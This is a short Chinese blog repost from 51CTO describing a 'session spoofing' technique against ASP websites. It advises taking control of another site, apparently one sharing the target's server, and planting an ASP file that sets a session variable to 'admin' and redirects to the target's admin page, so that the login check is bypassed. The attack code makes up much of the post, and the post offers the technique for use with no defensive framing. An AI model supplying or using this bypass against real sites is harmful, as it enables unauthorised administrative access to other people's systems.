关于session利用的思路,session在大多数网站都会用来判断是否已经通过验证并登陆。其实session欺骗很简单,提供一种思路:
(1)控制欲进行session欺骗的网站的其他网站。
(2)在控制的网站中写入一个asp文件,其内容如下:
<%
session("欺骗session的名称")="admin"
response.redirect [url]http://www.somesite.com/admin/index.asp[/url]
%>
其中somesite.com是你想要进行session欺骗的网站。
本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/51084
